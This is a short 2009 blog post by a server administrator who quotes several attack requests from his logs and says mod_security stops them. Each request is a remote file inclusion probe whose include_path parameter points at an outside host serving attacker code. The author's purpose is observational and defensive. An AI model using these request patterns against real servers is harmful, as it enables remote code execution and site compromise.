Nov 23, 2009

Let's do something stupid!

Let's try some stupid HTTP requests to my server :) For example, this:
GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
or
GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.vnmhost.net/01.gif? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0
or
GET /article//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0
or
GET /article/advanced-guestbook-spam-blocking.html//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0
I see requests like this daily in security logs of both my servers. They all are stopped by mod_security.
I wonder am I the only one who gets tons of this scum? :) If anybody else monitors his/her server security, you are welcome to share your "statistics" about these automated attacks to non–existing web applications.